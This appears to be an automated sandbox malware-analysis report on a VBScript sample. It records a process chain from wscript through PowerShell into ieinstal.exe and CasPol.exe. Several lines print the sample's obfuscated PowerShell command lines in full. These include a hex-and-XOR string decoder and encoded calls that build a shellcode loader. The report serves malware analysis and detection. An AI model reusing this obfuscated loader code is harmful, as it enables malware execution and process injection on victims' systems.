Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 17542
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5700
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 19424
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 17542 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5700 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 19424 Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 8_2_032279D3 8_2_032279D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07502A18 10_2_07502A18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07507430 10_2_07507430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07507420 10_2_07507420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07510040 10_2_07510040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0751EFF8 10_2_0751EFF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07517798 10_2_07517798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07510040 10_2_07510040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0751EFE8 10_2_0751EFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07526EE8 10_2_07526EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B73068 13_2_00B73068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B73D88 13_2_00B73D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B7FA20 13_2_00B7FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B73650 13_2_00B73650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B7C3B0 13_2_00B7C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B7EDD7 13_2_00B7EDD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B7E6F9 13_2_00B7E6F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00E26EBC 13_2_00E26EBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1D636FE0 13_2_1D636FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1D63A1E0 13_2_1D63A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1D639910 13_2_1D639910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1D6395C8 13_2_1D6395C8
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 1D63D140 appears 54 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: IMG_2022028022-0120.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] 